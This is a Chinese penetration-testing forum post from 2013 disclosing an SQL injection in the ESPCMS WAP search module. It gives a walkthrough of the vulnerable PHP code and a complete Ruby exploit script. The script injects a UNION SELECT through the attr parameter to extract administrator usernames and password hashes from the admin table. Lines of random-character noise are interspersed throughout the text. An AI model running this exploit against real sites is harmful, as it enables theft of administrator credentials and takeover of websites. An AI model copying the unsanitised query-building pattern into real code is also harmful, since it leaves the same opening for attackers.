中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
! N& P" G7 @' L- {
0×2 PoC
' V3 `. I* t& M2 f0 g: y# _2 b
+ V& I& {- h' M: \4 k
5 ?; g; m8 q6 i) y
! O. T r4 `% p: h* g. @
0×0 漏洞概述
- D8 [* d+ g3 r
6 ?& S; n( o2 H Q! p
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
$ A! H5 E- X" m `
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
" R) k& I4 j! O0 @( x% c
! |3 l( j6 d! s6 [
& v, i$ q1 W' {. H1 M# V
0×1 漏洞细节
; A0 H. ]9 H! l
7 b; Q) r3 p: a- T$ L, m% o$ v7 v# M
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
( G% ~% R# B( @# F
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
7 h' l0 B9 ]& |# |
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
5 f3 B; j v% @, Q) _3 Q" s
4 L8 N+ w8 D1 M" |: g, g- h
在/interface/3gwap_search.php文件的in_result函数中:
5 }: }( t0 W# h G1 B% L7 a- d" J
- |9 ~1 i$ l* \) J* p' l. Y8 S
4 L' i/ l5 q- I. @/ ^# ?7 G- P( L: K' @
+ l" y H+ q6 ~4 I
function in_result() {
3 Z# r& ?3 P- u u
... ... ... ... ... ... ... ... ...
0 d+ T$ W- k6 C" ~0 U* z
$urlcode = $_SERVER[ 'QUERY_STRING '];
1 \. K: }8 {0 }' g( x
parse_str(html_entity_decode($urlcode), $output);
( q1 ~ w6 @, c F. o a5 b9 [
; x5 ^2 E9 m! T9 a" q
... ... ... ... ... ... ... ... ...
* P: K+ X8 }; m8 [( k/ T
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
8 a) s; P% ]2 @+ ~2 x7 T
4 _2 ~/ K3 H; \, I. _" o
$db_table = db_prefix . 'model_att';
7 A& w5 Q5 p' {/ C C; t
' s" {9 \6 q u6 C% H1 F
foreach ($output['attr' ] as $key => $value) {
! p& z5 I \0 j4 r# J
if ($value) {
, w* Z } [5 u1 E- h
+ p p3 B1 ^; G% T+ U8 e7 ^) X2 o0 @
$key = addslashes($key);
+ d6 r( T0 V* b5 v/ t! M, `
$key = $this-> fun->inputcodetrim($key);
% [: ` j0 _- d- D6 o
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
* W& j# N6 U. a2 z7 G) F3 S# {8 }
$countnum = $this->db_numrows($db_table, $db_att_where);
* M6 s4 s3 h7 L" ~
if ($countnum > 0) {
8 P0 g' [, _( O s( F
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
0 t' V# ]% M$ r$ w* g V
}
8 g6 |1 m! L+ ?0 |+ |
}
0 @& m) t0 \! z- v6 M; c- K6 x; d: g
}
) J$ M' a" v4 ?1 g! S8 E n0 C
}
. |4 b. m# L3 H* k
if (!empty ($keyword) && empty($keyname)) {
6 B$ \1 s* o' L+ B
$keyname = 'title';
& F2 s& a0 \# ^5 {$ P$ g
$db_where.= " AND a.title like '%$keyword%'" ;
" R9 T/ J9 c( F3 I, J' |; J& g
} elseif (!empty ($keyword) && !empty($keyname)) {
7 h& N6 \% o, b9 T$ N' J) k2 Q
$db_where.= " AND $keyname like '% $keyword%'";
0 s, {2 c1 Y" d0 N) X
}
1 I& k$ Z3 ^3 H+ U+ m
$pagemax = 15;
$ w; z4 `& Y' _$ c; B* \7 J
! O K, } d- \3 @* s$ y- I
$pagesylte = 1;
. |& x/ _$ H! @
4 n3 A0 r+ d( X) C9 J1 U5 Z
if ($countnum > 0) {
7 B1 \0 ~3 Y! n _/ Z
% a, J* f$ G% P) ~, C
$numpage = ceil($countnum / $pagemax);
. x2 G6 I" j9 F0 A8 y
} else {
, G, ?1 c1 ^4 l6 f) X" `: q7 ~
$numpage = 1;
) {3 [( O6 W% P. d; J2 s8 f1 B
}
& W2 i- u A7 _ N* ^% B
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
/ v. F, w& [7 R* \5 H( n" v
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
4 h4 g5 M& d4 |: v" V
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
P$ V) Z- J2 @" f* w
... ... ... ... ... ... ... ... ...
* ?: _4 `) b$ T% Z) e6 R2 ]$ {1 {
}
# Y6 x& s' V2 X: n3 h* I
7 Y0 E) x1 }2 G! c8 o u, G
5 f8 |/ _& }! e1 j+ M
0×2 PoC
/ x( l4 R% _% t8 g. D
, p- n, A% `$ a, T! P& W
* }0 ~1 P+ z4 V( f
+ N6 l0 N7 D8 }
require "net/http"
' I% I* m: H- _
$ A! d# `5 q/ q! @* {
def request(method, url)
' ^) a1 k# ?% \' _* ^/ }5 |0 u' t
if method.eql?("get")
2 x+ N4 m" K G6 a
uri = URI.parse(url)
0 x! S, [7 u7 J, K. w; b
http = Net::HTTP.new(uri.host, uri.port)
* N; }- q, e r
response = http.request(Net::HTTP::Get.new(uri.request_uri))
+ e6 f5 u; t) o4 Q" B/ H
return response
5 P `& M& p% _+ |: E
end
* y3 [# F# H# `. h; M2 A
end
) _0 \) g# e+ ?) w9 R( c# a7 N
3 d6 X& X& }2 F) f
doc =<<HERE
" p) n. b3 x2 U% ]* p% ?. h7 ~
-------------------------------------------------------
* z' ^$ h: e4 e- W1 X$ t% E
Espcms Injection Exploit
; J8 P2 t1 c# ]
Author:ztz
+ B8 l* z0 c G& M" `8 l2 m7 C
Blog:
http://ztz.fuzzexp.org/
% y7 b- @( R q' S$ z
-------------------------------------------------------
, G/ V }5 r4 [6 }' g* b: @
% l0 r5 M) ^2 T1 m: \
HERE
4 K: `" Y4 m3 q/ y$ Y, z* \, M! t" C
: u7 O& j+ E5 v$ Y
usage =<<HERE
$ I& d2 p+ i& S. F$ `* s
Usage: ruby #{$0} host port path
4 Z% U1 t; P# [1 D
example: ruby #{$0}
www.target.com
80 /
/ V# V' p4 ]( U) \6 N; o+ r4 G% _
HERE
5 A6 ]1 @+ w# X8 ^3 p
" r# Q; U% R5 c; a
puts doc
6 Q. b+ t" A% C
if ARGV.length < 3
" s) V) t8 i& J
puts usage
! G* i7 y$ i" x" p0 T% Y8 h' Q% D
else
4 H1 i5 t, t5 q U
$host = ARGV[0]
- \0 h" K+ _: R
$port = ARGV[1]
* j8 }3 i4 x" \6 P0 Z( u9 q" Q) V
$path = ARGV[2]
9 h6 F& f$ ?3 q' S$ n; n/ j% V2 ~
l! a2 Z Q* l2 ~: p5 m, ~3 `1 }
puts "
send request..."
; s( a- l! ^. A, t3 p
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
" m. F1 u: T, n6 L0 Y
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
" @+ W+ U5 j/ M% {
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
$ {! Y* s, g8 H- Y/ t
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
1 B5 B- T& A! ^! i' J
response = request("get", url)
& f. L t6 G! F* v5 @8 f; L
result = response.body.scan(/\w+&\w{32}/)
/ Q' ~" c; `7 W5 h- M
puts result
& S" R7 o8 }2 @, D
end
+ i& {+ m. v- `
5 q! n% c, ^9 t. m- E' N
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2